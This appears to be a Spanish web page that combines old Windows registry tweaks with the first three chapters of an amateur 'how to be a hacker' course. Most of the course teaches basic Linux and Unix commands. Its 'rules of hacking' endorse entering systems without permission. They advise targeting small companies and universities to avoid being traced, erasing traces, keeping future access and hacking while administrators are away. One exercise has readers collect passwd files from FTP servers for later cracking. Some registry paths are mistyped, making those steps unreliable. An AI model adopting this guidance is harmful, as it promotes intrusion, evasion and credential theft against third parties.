4) Si no quieres desintalar alguno, basta con borrarlo.

Evitar la frase "Acceso Directo" al crear uno

Para hacer este truco, simplemente se deben seguir los pasos a continuación:

1) Creamos 1 acceso directo, y le cambiamos el nombre; por ejemplo, "Acceso directo a Mis Documentos", lo debemos cambiar por: "Mis Documentos".

2) Repetimos el paso 1 seis veces, y listo, no nos aparecerá más esta frase.

*) Lo de "Mis Documentos", es un ejemplo, se puede hacer con cualquier acceso directo.

Cambiarle el icono a nuestro disco duro

1) Debemos crear un archivo llamado AUTORUN.INF

2) Lo abrimos, y le escribimos:

[AUTORUN]
Icon=(ubicación del icono a utilizar)

3) Reiniciamos, y listo !!!

*) No funciona en disquetes, y si se tiene más de un disco duro, no habrá problemas

Ocultar máquinas de Red
1) Abrimos el Registro (inicio, ejectuar Regedit)

2) Ruta HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\Set\Services\LanmanServer\

Parameters\

3) Añadir Valor (Teclear Oculto, elegir REG_DWORD y ok)

4) Valor 1 invisible, Valor 0 Visible

Cambiar color de las pantallas de error
1) Con el Notepad abrir archivo System.ini

2) Localizar Sección 386ENH

3) Añadir a esa sección el siguiente texto:
MessageBackColor=Numero de color y MessageTextColor=Numero de Color

4) Los números de colores son: 0 -> Azul, 1 -> Verde, 2-> cian, 3 rojo, 4 magenta, 5 marrón, 6 blanco, 7 azul intenso, 8 verde intenso, A: cian intenso, B rojo intenso, C magenta intenso, D amarillo, E blanco.

Eliminar Favoritos del Menu Inicio
1) Ejecutar Regedit

2) Busca HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3) En la parte derecha pon "Nuevo Valor DWORD", y como nombre "NoFavoritesMenu"

4) Una vez creado, pones Modificar Valor Hexadecimal y le pones "01 00 00 00"

5) Nota: hay que escribir los valors que salen entre comillas pero no las comillas

Velocidad de despliegue del Menu Inicio
1) Ejecutar Regedit

2) Buscar HKEY_CURRENT_USER\ControlPanel\desktop

3) Añadir nuevo valor de cadena con el Nombre "MenuShowDelay"

4) Pone un valor entre 1 y 65535 (1 muy rápido 65535 muy lento)

Animación de Ventanas
1) Ejecutar Regedit

2) Buscar HKEY_CURRENT_USER\ControlPanel\desktop\WindowsMetrics

3) Nuevo Valor de cadena con el Nombre "MinAnimate"

4) Habilitar Animación -> 1, deshabilitar -> 0

Cambiar el tamaño de los Iconos
1) Ejecutar Regedit

2) Buscar HKEY_CURRENT_USER\ControlPanel\desktop\WindowsMetrics

3) En la parte derecha tenemos ShellIconSize

4) Modificar este valor para hacer más grande el icono o más pequeño (por defecto 32)

Programas que se inician automáticamente

Nota: Los programas que se inician automáticamente suelen estar en c:\Windows\MenuIncio\Programas\Inicio, pero otros se inician en una "clave" del registro modificable

1) Ejecutar Regedit

2) Buscar HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrrentVersion\Run

3) En la parte derecha aparecen programas que se inician al encender Windows.

4) También Run Services y alguna más se cargan al inicio (ejemplo Panda Antivirus se carga en Run Services)

Explorador de Windows actualiza automáticamente
Para que al hacer cambios, windows refresque, actualize automaticamente sin tener que apretar F5

1) Ejecutar Regedit2) Buscar HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update]
3) Localizar "UpdateMode"

4) Hacer uno nuevo valor DWORD con valor 1

Cambiar la ruta desde dónde se obtienen ficheros fuente
1) Ejecutar Regedit

2) Buscar HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrrentVersion\Setup

3) Modificar la clave "SourcePath"

Nombres cortos más legibles
1) Ejecutar Regedit

2) Buscar HKEY_LOCAL_MACHINE\System\CurrentControl-Set\Control\FileSystem

3) Nuevo, Valor Binario, escribiendo entonces "NameNumericTail" como nombre y 0 como valor binario

Nota: Este truco tendrá efecto a partir del momento que lo hagamos, asi que los antiguos ficheros nombrados Archiv~1 (Archivos de Programa) seguiran teniendo la tilde

Más información sobre el procesador
1) Se trata de buscar una clave en el Editor del Registro
Al hacer clic con el botón derecho del ratón sobre el icono Mi PC y seleccionar Propiedades, Windows muestra una ventana Propiedades de Sistema en la que, entre otras cosas, aparece una escueta reseña sobre el procesador instalado en el equipo. Si desea obtener una información más detallada al respecto, no hay más que ejecutar el Editor del Registro y buscar esta clave:


2) HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0


3) Edite el valor VendorIdentifier, que debe contener la cadena GenuineIntel (si se trata de un procesador Intel). Lo que hay que hacer es introducir un espacio entre las palabras Genuine e Intel, cerrar el registro, acceder a las propiedades de Mi PC y comprobar como la descripción que se obtiene ahora es algo más detallada.

Mayor tamaño de la caché del CD-Rom
1) Se trata de buscar una clave en el Editor del Registro
no hay más que ejecutar el Editor del Registro y buscar esta clave:


2) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CD-Rom


3) Una vez colocados en esta rama, crearemos una nueva entrada binaria "Required Pause Tolerance y le daremos el valor hexadecimal de "e7 13 00 00" si trabajamos con Windows 98. Si tenemos Windows ME, debemos crear la clave CD-Rom entrar la clave binaria "Required Pause Tolerance con el valor "00 50 00 00". Recuerda que pongo los valores entre comillas, pero tu no debes copiar las comillas

Eliminar el login y password del Windows NT
1) Se trata de buscar una clave en el Editor del Registro
Abrir el registro del NT y buscar:

2) HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\_CurrentVersion\WinLogin


3) Una vez allí introducimos las siguientes variables:


DefaultDomainName (nombre del dominio por defecto)
DefaultPassword (password por defecto)
Default UserName (login por defecto)
AutoAdminLogon (con valor 1 para que no salga)

Apagar o reiniciar más rápido Windows
1) Windows analiza todos los componentes en curso (DLL, VXD, OCX etc) antes de proceder al cierre de la sesión. La configuración por defecto es de 20 segundos para el cierre.

2) Abrir Regedit y HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
En la ventana de la derecha, buscar el valor de cadena llamado WaitToKillServiceTimeOut
Si no existe, crearla. Clic sobre este valor e introducir el valor deseado para la duración de cierre de los componentes (de 1 a 20 segundos).

3) Te aconsejo que empieces con 15 y de ir reduciendo de forma progresiva, probando cada vez. Debido a la cantidad de configuraciones distintas posibles, no puedo hacer claves para cada una

Cerrar las aplicaciones más rápidamente
Conoces el truco que permite cerrar una aplicación en curso o que está bloqueada (CTRL+ALT+SUPR). El único inconveniente es que Windows tarda mucho en cargar esta ventana. Esto permitirá reducir el tiempo de espera:

Abrir Regedit y HKEY_CURRENT_USER\Control Panel\Desktop
En la ventana de la derecha, crear 2 nuevos valores de cadena:
HungAppTimeOut: (corresponde al tiempo de cierre de una aplicación) y darle el valor 1.000 (por defecto ese valor está fijado en 5.000 milisegundos)
WaitToKillAppTimeout: (corresponde al tiempo de espera máximo para que se cierren la(s) aplicación(es) en curso) y darle el valor 1.000 (por defecto está en 20.000 milisegundos)

Estos 2 valores permitirán de reducir considerablemente el tiempo de análisis previo a la apertura de la ventana Cerrar programa (Ctrl+Alt+SUPR) así como el tiempo de cierre de las aplicaciones. Pueden utilizarse valores distintos, pero no intentes poner un valor de sólo 1 milisegundo (bloquearías Windows), seleccionar estos valores con mucho cuidado.

Utilizar Windows Update sin registrarse
Una de las funciones de Windows 98 es WindowsUpdate que permite recuperar las últimas actualizaciones del sistema operativo así como de otras utilidades.

El inconveniente de WindowsUpdate es la obligación de haberse registrado como usuario Microsoft. Si quieres utilizar ese servicio sin tener que proporcionar información privada, sigue las instrucciones a continuación:

Abrir Regedit y HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
En la ventana de la derecha, clic (o crear) sobre el valor de cadena llamado RegDone y darle el valor 1. Cerrar Regedit y ejecutar Windows Update para actualizar las aplicaciones Microsoft

Cambia las Tips
Si quieres cambiar las Tips (son esas fases que se muestran al comienzo de Windows), basta con acceder a la clave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\explorer\Tips Te parecerán 47 Tips puedes cambiarlas pulsando sobre ellas.
Como ser un hacker

Capítulo 1.
El arte del Hacking
    Saludos, internautas de Lanus y a los otros tambien.  voy a intentar resumir en cuatro o cinco lecciones lo que yo creo que debés saber si   querés convertirte en hackers. Este curso está orientado a todas aquellas personas que estén interesadas en aprender el arte del hacking, pero del hacking tal y cómo se entiende, y esta es una cuestión que vamos a tratar especialmente   en esta unidad.

    Pero ¡cuidado! Este curso, tal y como su nombre indica, es de carácter introductorio. Todo lo que voy a enseñar no es más que lo que tenés que aprender para empezar, de alguna manera, a hackear. Es simplemente lo más básico, con esto no  vas a convertir en élite. Deberas buscar más material y con el tiempo acabaras siendo élite, pero no quieras aprenderlo todo en un día, y no te obsesiones mucho en este pequeño tutorial. Simplemente tómalo como el primer paso para entrar en el hacking. Una vez hayas hecho este paso ya estarás dentro y no  será fácil salir.

¿Por qué un curso de carácter introductorio y no uno completo?

    Para empezar, creo que lo que más cuesta es iniciar, empezar a hacer algo de hacking. Es decir, te podés pasar horas leyendo documentos en inglés que pueden explicar cosas muy interesantes como el IP Spoofing o cómo programar caballos de troya en C, pero que no te serán de utilidad si antes no sabés que tenés que tener determinado sistema operativo y unos determinados conocimientos básicos para aprovechar ese material. Y es que, de hecho, en Internet hay pocos tutoriales que realmente expliquen paso a paso qué hacer para empezar a hackear. Por eso creo que este tutorial cumple una función muy importante. Como ya te e dicho antes, con este tutorial podes dar un primer paso. Luego, ya te vas a despabilar solito. En segundo lugar, aunque llevo un tiempo en esto del hacking, no me considero élite y no tengo suficientes conocimientos para hacer un curso completo que abarque todo lo que se puede hacer hackeando.

¿Requerimientos?
    No importa si no sabéis mucho de informática, lo más importante es que tengás ganas de aprender y no seás muy perezoso


El curso se divide básicamente en:

       Introducción al hacking
       Teoría: Entorno LINUX (incluyendo ejemplos, ejercicios prácticos, etc…)
       Teoría: Entornos UNIX internacionales
       Métodos de hacking: entrar un sistema

Antes de empezar…
He aquí unas definiciones que debes saber, porque las voy a ir usando durante el curso. Estas son solo las básicas, a medida que avance el curso iras aprendiendo más. La mayoría de estas definiciones las sabras pero, repito, este curso está orientado a toda clase de usuarios, expertos y novatos.

Linux : Sistema Operativo multiusuario, versión UNIX de PC.
Login: Nombre de usuario que se usa para entrar en un sistema determinado

Password:Clave que tiene cada usuario para entrar en un sistema determinado

Anonymous: Login predeterminado para sistemas que dejan entrar usuarios libremente sin pedírles identificación. Esto comporta siempre limitaciones y restricciones.
FTP: File Transfer Protocol. Es el puerto 21 de un sistema determinado, que usa un programa servidor de FTP para que otros usuarios entren con un programa cliente de FTP con el fin de poder subir/bajar archivos de/a ese sistema.

Telnet: Corresponde al puerto 23 de un sistema determinado. Podemos entrar en él y, dependendiendo del tipo de cuenta que tengamos en el sistema podemos manipular ese ordenador como si fuese nuestro, tecleamos las órdenes como las teclearíamos en nuestro Linux.

Listening: Se dice que un ordenador está listening si está esperando conexiones, es decir, si acepta conexiones remotas. Cualquier ordenador que esté listening es vulnerable, nunca olvides esto.

Root: Es el super-usuario de un sistema determinado, lo cual quiere decir que puede manipular el ordenador sin ningún tipo de restricción. Esto significa que puede ver/manipular/eliminar cualquier archivo de cualquier directorio del sistema. El root es, por supuesto, el amo del sistema, pero cualquier usuario que tenga acceso a éste, puede, si sabe cómo, obtener este nivel. Es de hecho en lo que se basa el hacking.

IP: Es la combinación de números que nuestro proveedor de Internet nos asigna cada vez que conectamos y que nos identifica. Ejemplo: 194.179.106.2 (xxx.xxx.xxx.xxx). Cada usuario de Internet tiene una distinta. Los sistemas, por supuesto, también tienen la suya, pero es fija y por eso su Host también es fijo. Ciertos usuarios también pueden contratar una IP fija si lo desean en su proveedor.

Host: Es la manera fácil de leer una IP, ya que está formada por palabras y algunos números. Ejemplo: ppp342.redestb.es.


Introducción al Hacking. ¿Qué es el hacking?


    Si hiciésemos esta pregunta a cien personas, quizás solo quince nos dirían una definición adecuada y correcta. El Hacker es aquella persona capaz de irrumpir en un sistema cualquiera, sin permiso previo, para leer, modificar, o simplemente curiosear entre la información que hay dentro de este, y marchar sin dejar ningún rastro. Un hacker no es aquella persona que anda por el IRC diciendo a todo el mundo: "Soy un hacker de la élite y te voy a romper el ordenador y la reparación te va a costar … " . Esas personas ni son hackers ni son élite, simplemente son personas que se aburren, que tienen complejos de inferioridad y que no saben en qué invertir su tiempo.
¿Para qué sirve el hacking?

    A parte de ser un entretenimiento que te hace aprender mucho sobre sistemas, es un reto intelectual que te somete a un espíritu de constante superación. Es peligroso, sí, pero eso es parte del juego. El hacking te llena además de amplios conocimientos de sistemas y telecomunicaciones en general. Aprendes a usar un sistema operativo alternativo (LINUX), descubres los errores de TCP/IP, los fallos de seguridad de los sistemas UNIX… Es en definitiva una manera de ampliar nuestros conocimientos si de verdad nos interesa estemundoque es la informática.
Las normas del hacking

    Hay muchos boletines en Internet que contienen las normas, los mandamientos, es decir, las pautas que tiene que seguir un buen hacker. Estas diez normas son las que yo creo más importantes:

    No hay que hacer acciones que perjudiquen a terceras personas. Por ejemplo, borrar el contenido de un directorio de inicio de un usuario que no conocemos de nada.

    No hay que dar nunca nuestros datos personales en ningún sitio, solo a las personas que conozcamos y tengamos confianza en ellas.

    No hay que hackear en sistemas gubernamentales. Nos encontrarían fácilmente. Las pequeñas empresas y las universidades muchas veces no se permiten el lujo de buscarnos en el caso que nos dejemos nuestra IP en el sistema.

    No hay que dar datos del sistema en el que estamos hackeando a nadie. ¿No querrás que otro hacker te robe el trabajo que llevas hecho?

    Solo destruiremos aquella información que nos perjudique o que perjudique a alguna persona, no destruiremos nada si no tenemos ningún buen motivo para hacerlo.

    Modificaremos solo los archivos que borren nuestras huellas y los que nos permitan un futuro acceso.

    Si nos detienen es porque hemos hecho algo mal, siempre que hayamos dejado intacto el sistema no tienen nada que alegar en contra nuestra, a no ser que hayamos tenido acceso a información muy privada, de sistemas muy importantes como la FBI, la NASA… entonces hay que contactar con un abogado. A un buen hacker no le caen nunca condenas grandes.

    No hay que estar más de dos horas conectado a un sistema cuando se es root.

    Hackearemos cuando estemos seguros de que el sysop del sistema no esté delante del ordenador (por la noche o en festivos).

    No usaremos nukes, mail bombs, ni cosas por ell estilo para putear a otras personas, a no ser que tengamos un buen motivo para hacerlo. Es decir, no usaremos esos programas por simple diversión.

Lo básico del hacking

    Ahora ya sabés qué es y para qué sirve el hacking, y cómo te tenes que comportar si querés ser buen hackers. Este punto aclarará todas o casi todas las dudas que tengás una vez llegado aquí. Cada uno de ustedes tendrá una motivación diferente respeto al hacking. Pero debés conocer las fronteras y los límites de este. Es decir, lo que podés y lo que no podés hacer sabiendo hackear.

    Para empezar, no os hagás ilusiones, no podrás entrar en el ordenador de un amigo y manejar el prompt de MS-DOS como si estuvieras ahí. Entrar en un ordenador que no está listening (esperando conexiones) es más difícil y se hace a través de un puerto que muchos, casi todos los usuarios de Internet suelen tener abierto. Pero esto no lo voy a explicar porque la intención del curso no es esta.

    En este curso solo aprenderás a entrar en ordenadores UNIX, y que tengan al menos telnet o ftp en listening. No ote preocupes la mayoría de ordenadores de universidades, ftp’s y demás usan UNIX,

solo unos pocos usan sistemas como Mac o NT.

    Ahora es muy difícil poder hackear ordenadores de proveedores de Internet, ya no suelen tener el telnet nunca abierto.

    "Este curso está enfocado al hacking desde LINUX, que es el sistema UNIX que podemos tener más a mano. En el próximo capítulo voy a explicar cómo conseguir LINUX y cómo instalarlo. Desde Win 98 se pueden hacer muchas cosas instalando programas que ya vienen preparados para estas funciones,
como ser scaner de puertos, buscadores de direccio
nes ip etc...."


Les gusto ??????? sigan que el curso no termina...
HA!!!, recomienden la pagina a sus amigos.
ByE... ByE...
    Capítulo 2.
Manejando Linux,


Qué es LINUX

Iniciarse en el entorno LINUX/UNIX

Entender el entorno multiusuario UNIX

Otros ejercicios prácticos para LINUX


Si estas aca porque ya leiste el capitulo anterior

Lo que es en realidad el hacking

Para qué sirve el hacking

Cómo se comporta un hacker

¿Qué es LINUX?
LINUX es la versión del sistema operativo multiusuario UNIX para PC. Se trata de un SO de dominio público y totalmente gratuito que se distribuye por Internet y por revistas. Consulta el primer capítulo del curso introductorio al Linux en las paginas de lanusonline para obtener más información acerca de qué es Linux y cómo conseguirlo. Así mismo, en la próxima lección te dare información más técnica sobre Linux así como algunos de sus bugs más conocidos.

En este capítulo vamos a tratar a partir del Linux los comandos más básicos de los sistemas UNIX en general, el sistema de ficheros y de directorios, el sistema multiusuario de UNIX...

Consigue Linux y empieza a leer este capítulo.

Iniciarse en el entorno Linux
Antes que nada debes saber que para poder tener en un mismo disco los dos sistemas operativos
instalados o sea win y linux deberas particionar este y instalarle el LILO, que es un arranque dual
para que puedas elegir con que sistema queres trabajar

Después de teclear la palabra Linux en el prompt del LILO veremos el sistema de arranque de este sistema, cómo nos va detectando cada dispositivo, etc...

Finalmente aparecerá el prompt de inicio



"

Welcome to Linux 2.0.1

Host Login:

"

(Host es el host que hemos asignado a nuestro ordenador)

Cuando instalamos Linux entramos como root, porque por defecto la cuenta de root ya está creada. Así que solo tenemos que entrar como root y ya estamos dentro, no nos pedirá ningún password. Una vez dentro, vamos a establecer un password para que nadie más que nosotros pueda entrar como root. No seas lamers y busca un password realmente difícil de desencriptar, que no sea una palabra sola sino que sea una serie de letras y números que no tengan sentido. Un buen root pone siempre un password de este tipo ya que los hackers suelen utilizar programas de desencriptación asociados a diccionarios (palabras agrupadas según temas) para desencriptar el password, pero todo esto lo explicaré más adelante.

Solo tenes que teclear:



# passwd root

Y a continuación introducir el password que hayás pensado. Más adelante vamos a ver cómo crear más cuentas y todo lo relacionado con el entorno multiusuario que es Linux.

Ahora echale un vistazo a lo que tenés delante. Sí, es como un MS-DOS pero con colores (depende de la distribución). Las últimas distribuciones incluyen, además, un entorno gráfico muy parecido a Windows 98, llamado X-Windows, que no voy a explicar cómo instalar porque no es de vital importancia para hackear., pero si para conectarte a internet, porque aunque linux es muy bueno tiene sus grandes
complicaciones a la hora de manejarse en el entorno del promt

Sistema de ficheros y directorios
Antes que nada tenemos que entender cómo son los ficheros en Linux y en UNIX en general. Pueden tener extensiones más extensas a tres caracteres, que es el máximo en MS-DOS y en Windows. Con un listado detallado (más adelante veremos cómo hacerlo) obtenemos una información así:

                                              *   1        2        3
(.)nombre del fichero.(extensión)   bytes   _  _ _ _ | _ _ _ | _ _ _
Si aparece el punto delante del nombre del fichero es que es un fichero oculto.

* - aquí puede haber una D, que nos indicaría que se trata de un directorio, no de un fichero

En estas tres casillas aparecen los accesos que tiene el owner sobre este fichero. El owner de un fichero es el que lo ha creado y el que puede cambiar los accesos de éste. Los accesos de un fichero son:

R - Si aparece una R es que se puede leer

W - Se puede escribir, alterar, modificar

X - Si es ejecutable, se puede ejecutar

De este modo, si en las tres casillas del owner hay una R, una W y una X es que el propietario de este fichero tiene todos los accesos sobre éste, cosa que es normal.

Los accesos que tienen que pertenecen al mismo grupo que el owner. En sistemas UNIX los usuarios pueden clasificarse por grupos por el root.

Los accesos que tiene cualquier usuario del sistema sobre el fichero.

Es importante que adquierás la costumbre de interpretar los accesos de cada fichero que quieras examinar. Cuando estés hackeando tendras que conocer siempre tus posibilidades sobre un fichero determinado.

En cuanto al sistema de directorios, es parecido al de MS-DOS. Los directorios pueden variar de un sistema UNIX a otro, pero todos tiene estos:

/usr/ - es donde están las cuentas de inicio de cada usuario

/adm/ - directorio exclusivo para el admin del sistema

/root/ - directorio de inicio para el admin del sistema

Comandos más utilizados para manejar ficheros
- Cp - Este comando sirve para hacer copias de un fichero. Y esta es su sintaxis:



cp (fichero a copiar) (fichero destino)

Así, si queremos hacer una copia de un fichero llamado "hacking.13886" a uno que simplemente se llame "138" haremos:



# cp hacking.13886 138

El fichero a copiar sigue intacto, solamente hemos hecho una copia sin borrar el fichero original.

- Rm - Este comando sirve para eliminar uno o más ficheros. Esta es su síntaxi:



rm (fichero a eliminar1) (fichero a eliminar2) (etc)

También podemos elliminar directorios con este comando. Con rm (directorio) eliminamos un directorio suponiendo que esté vacío. Si añadimos la opción -r podemos eliminar directorios llenos, incluso con subdirectorios.

- Cat - Este comando nos permite ver el contenido de un fichero sin editarlo. En un terminal sencillo (que no sea X-Windows), si el contenido es muy largo solo vamos a ver el final de este fichero. Podemos ver el contenido de varios ficheros a la vez, ya que su sintaxis es:



cat (fichero a ver1) (fichero a ver2) (etc)

- Mv - Con este comando podemos mover el contenido de un directorio a otro directorio. Podemos hacer lo mismo con dos ficheros, pero el fichero de inicio queda eliminado al mover todo su contenido al fichero de destino.



mv (directorio/fichero inicio) (directorio/fichero destino)

- Chmod - Nos permite cambiar los accesos de un archivo. Su síntaxis es algo complicada:



chmod (tipo de acceso)+(acceso) (fichero)

Tipo de acceso: Aquí tenemos que escribir una letra, que nos servirá para especificar si queremos cambiar los accesos para todos los usuarios, para el owner, o para los del grupo:

(a)ll, accesos para todos

(o)wner, accesos para el owner

(g)roup, accesos para el grupo

Acceso: Aquí tenemos que especificar cualquiera de estos tres accesos: R, W, X, que como ya sabés son de lectura, de escritura y de ejecución respectivamente.

Ejemplo: Si queremos cambiar el acceso del fichero host.equiv para que todos los usuarios puedan modificarlo (algo que no debé hacer nunca) haríamos:



# chmod a+w host.equiv

- Find - Es un buen buscador presente en casi todos los sistemas UNIX que nos permite encontrar cualquier fichero. Esta es su sintaxis:



find . -name (razón de búsqueda)* -print

Naturalmente es un programa complejo y se puede usar de muchas maneras pero esta es la manera en que yo lo uso casi siempre. La razón de búsqueda es simplemente un trozo del nombre de un fichero o el nombre del fichero. Por ejemplo, si sabemos que hay un fichero que se llama lilo pero no sabemos como acaba y tampoco donde está, pondremos:



# find . -name lilo* -print

Nos encontrará varios ficheros con su ruta completa y decidiremos cuál es el que estábamos buscando, que en este caso sería lilo.conf



/etc/lilo.conf

- File - Este comando, en cualquier sistema UNIX nos permite obtener información básica acerca de un fichero, no el contenido del mismo. Podemos ver en pantalla la información de varios ficheros a la vez ya que su síntaxis es:

file (fichero1) (fichero2) (etc)

Comandos más utilizados para moverse por los directorios
- Pwd - Si escribimos pwd en el prompt, obtenemos la ruta completa del directorio en el que estamos. Si simplemente sale una / es que evidentemente estamos en la raíz.

# pwd

/usr/

- Ls - Hace un listado de los ficheros del directorio activo. Si sólo escribimos Ls, veremos los ficheros que son visibles. Con ls -a veremos el listado de todos los ficheros. Con ls -l veremos, además todos los detalles de un fichero (excepto el contenido del mismo).

Atención: En un sistema UNIX, hay ficheros visibles y ficheros ocultos. Los ficheros ocultos llevan delante un punto (.), esto es muy importante y debes aprenderlo. Haz siempre un listado con los parámetros -la para ver todos los detalles del directorio.

- Cd - En Linux podemos desplazarnos por los directorios igual que en MS-DOS, con el comando CD. Hay unas ligeras diferencias. Cuando queremos cambiar al directorio anterior en vez de escribir



# cd..

Unknow command

Tenemos que escribir:

# cd ..

#

Eso es, con un espacio entre los dos puntos y el comando CD.

En muchos sistemas UNIX, si simplemente tecleamos CD nos movemos al directorio de inicio.



# cd

# pwd

/root

- Mkdir - Con este comando podemos crear directorios. Funciona como el comando md de MS-DOS.

Entorno multiusuario UNIX
Cuando decimos que UNIX es un sistema multiusuario nos referimos a que es un sistema diseñado para que pueda ser usado por usuarios distintos. Así, un sistema UNIX puede ser utilizado para que varios usuarios remotos (Internet) o locales (LAN, Ethernet) puedan conectarse a él y puedan estar dentro del sistema simultáneamente. Esto ya nos supone un problema, pues si nos paramos a pensar, en teoría cualquier usuario que pudiese conectar con el sistema podría hacer cualquier tarea, cualquier acción como la haría el propietario del sistema; en definitiva este usuario podría manejar a su antojo el ordenador, algo que sin duda el propietario del mismo no está dispuesto a permitir. Por eso se crean una serie de accesos, de prioridades, para hacer más fácil la convivencia entre los diferentes usuarios de un sistema UNIX (Más adelante aprenderemos a cambiar nuestro acceso para hacer lo que precisamente el propietario del sistema no quiere que hagamos, manejarlo como lo haría él).

Así pues, dentro de un sistema UNIX hay que diferenciar dos clases de usuarios:



   
1 - El usuario ordinario. Un usuario ordinario entra en el sistema gracias a una cuenta predefinida por el root, que consta de login y password, en un directorio de inicio. El login es el nombre por el cual los otros usuarios pueden identificarlo. El directorio de inicio es donde puede escribir o borrar ficheros, crear o borrar directorios, ejecutar programas... Este tipo de usuario puede ejecutar programas hechos por él ya sea en shell o en C y programas genéricos que cualquiera pueda ejecutar como es el ejemplo de un editor de texto. Generalmente no puede moverse de su directorio de inicio, lo que lo restringe de otras áreas del sistema. Cada usuario ordinario tiene en su directorio un archivo llamado .profile que es como un AUTOEXEC.BAT de MS-DOS, contiene comandos que, cuando hace un login al sistema, se ejecutan. Esto es importante que lo sepas porque se pueden crear caballos de troya en archivos .profile.

El ejemplo de este tipo de usuario puede ser el del típico estudiante universitario que se conecta a un sistema UNIX para escribir documentos relacionados con su carrera, o si es un estudiante de informática para aprender el entorno UNIX y saber programar dentro de él, etc..
hoy dia son muy pocos los sistemas que permiten programacion en sus entornos.

El directorio de inicio es visible por el root como /usr/login, donde login es el nombre del usuario, es decir, su login.

Podemos saber si somos un usuario ordinario si tenemos como prompt el signo:



$

Es decir, si antes de escribir un comando tenemos este signo.

Al escribir who nos debe salir nuestro login.



$ who

juan178

$

   
2 -
El usuario root o, en su defecto, el usuario con acceso de root. También llamado superusuario, es el usuario que tiene acceso a todo el sistema sin restricción alguna. En un principio solo el propietario del sistema puede acceder como root a su propio sistema, pero los hackers basan muchas veces sus ataques en intentar conseguir accesos de root a partir de una cuenta ordinaria. Es decir, que en cualquier sistema UNIX se puede llegar a conseguir acceso de root si se es lo suficientemente hábil. El principal problema de los sistemas UNIX desde mi punto de vista es que el root, como cualquier usuario tiene su propia cuenta. De esta manera podemos llegar a alterarla o incluso a crear otra cuenta con acceso de root. Más adelante veremos todo esto.

Sabremos si somos root si tenemos como prompt este signo:



#

Y si aún no nos lo creemos podemos escribir el comando who.



# who

root

#

Las cuentas, el fichero passwd
Ahora ya sabes que hay dos tipos de usuarios bien distinguidos en un sistema UNIX. Si un usuario puede entrar en un sistema es porque tiene una cuenta, esto lo entendemos, ahora bien ¿ Cómo sabe el sistema qué usuarios pueden entrar y cuáles no ? A través del fichero passwd. Localicémoslo. El fichero passwd se encuentra, en la mayoría de sistemas UNIX en el directorio /etc. Es sólo modificable por el root, pero leíble por todos los usuarios. Eso es un gran fallo ya que se puede aprovechar muchas veces para desencriptar contraseñas, algo que vamos a ver en el capítulo 4.

El fichero passwd contiene las cuentas del sistema, es decir, contiene la información de todos los usuarios que pueden hacer login al sistema, independientemente de su acceso (ordinario o root).



Es interesante que empieces a meterte en sistemas que acepten cuentas anónimas (por ejemplo, FTP's) para que veas cómo es el fichero passwd. La mayoría de FTP's dejan acceder como anonymous al sistema, sin ningún password. Consulta el final de esta unidad para hacer este ejercicio.

Sabemos, pues, que el fichero password lleva las cuentas de todos los usuarios del sistema. Cada linea del fichero es una cuenta, y en esta linea hay representados estos elementos:

login del usuario (ya sabemos lo que es)

password del usuario (no te iluciones nunca aparece tal como es)

nombre del usuario (en algunos sistemas) o número del usuario (en otros sistemas)

grupo al que pertenece el usuario

directorio de inicio del usuario

shell del usuario


En otra unidad veremos muchas más cosas sobre el fichero passwd, y aprenderemos a crackearlo y a aprovecharlo.

Desde nuestro LINUX podemos crear cuentas, con el comando adduser. Simplemente hay que teclear adduser y ir contestando a las preguntas que va haciendo.

Ejercicios para LINUX
Ahora, conviene que vayas practicando con tu LINUX. Te recomiendo que hagas estos ejercicios:

   
1 -
Crea directorios y ficheros. Por ejemplo, puedes empezar por crear un directorio con tu nombre y empezar a escribir un diario de tus experiencias como hacker.

Para editar o crear ficheros puedes usar el editor "vi". Simplemente tienes que escribir "vi" y el nombre de fichero que quieras crear/editar. Inicialmente, con la letra A empiezas a escribir. Con ESC activas el modo de no-escribir con el que puede borrar líneas apretando dos veces la tecla R, con ":wq" salvas lo que has escrito y con ":q!" quitas sin salvar.

Pero mejor aprende a usar el editor ED, porque el Vi no está en todos los sistemas UNIX.

   
2 - Configura tu Linux para el acceso a Internet. Esto puedes conseguirlo buscando información al respeto.  busca por Internet, seguro que encontrarás programas o información para hacerlo.


   
3 - Haz sesiones en FTP's. Esto lo puedes hacer escribiendo FTP y el host de la máquina en la que quieres entrar. Muchos FTP's aceptan usuarios anónimos, así que no hay problema. Busca y bájate el archivo passwd y empieza a mirártelo.

   
4 -
Curiosea sanamente en tu LINUX. Esto quiere decir que no toques algo si no sabes lo que es, simplemente dedícate a moverte por los directorios y a observar qué hay. Siempre con mucho cuidado.

   
5 - Crea cuentas, con el comando adduser.                              

Y??? lo estas siguiendo ???? te gusto el capitulo 2 ???
No te muevas de esa silla que hay 2 capítulos más.....
Capítulo 3.


Breve análisis a los sistemas Unix
En esta unidad aprendera


Más sobre los sistemas UNIX

Tipos de sistemas UNIX

Características de los sistemas UNIX más importantes

Si estás aquí se supone que sabes:

Lo que es en realidad el hacking

Para qué sirve el hacking

Cómo se comporta un hacker

Qué es LINUX

Iniciarse en el entorno LINUX/UNIX

Entender el entorno multiusuario UNIX

Otros ejercicios prácticos para LINUX


Bien, en este minicapítulo vamos a aprender algo sobre los sistemas UNIX universales, casi todos los que existen en Internet. Inicialmente esta información no te será de gran utilidad, pero más adelante si.

Sistemas UNIX
    Desde los orígenes de Internet, este ha estado formado básicamente por máquinas UNIX. Se trata de un sistema multiusuario que es usado, básicamente, como servidor. Así, podemos encontrar máquinas UNIX en servidores de FTP, en servidores de correo electrónico, en servidores de WWW, en servidores de IRC... Pero dado su entorno multiusuario es también usado mucho en Universidades, Bancos, así como en algunas entidades gubernamentales. Actualmente el número de sistemas UNIX en Internet está disminuyendo y está aumentando el de sistemas NT, aunque UNIX sigue siendo claramente superior (alrededor del 65% de máquinas de Internet son UNIX). El otro 35%, lo forman básicamente sistemas como el NT, ya mencionado, aunque también existen otros como VM/CMS, VM/ESA, VMS...

Clasificación de sistemas UNIX
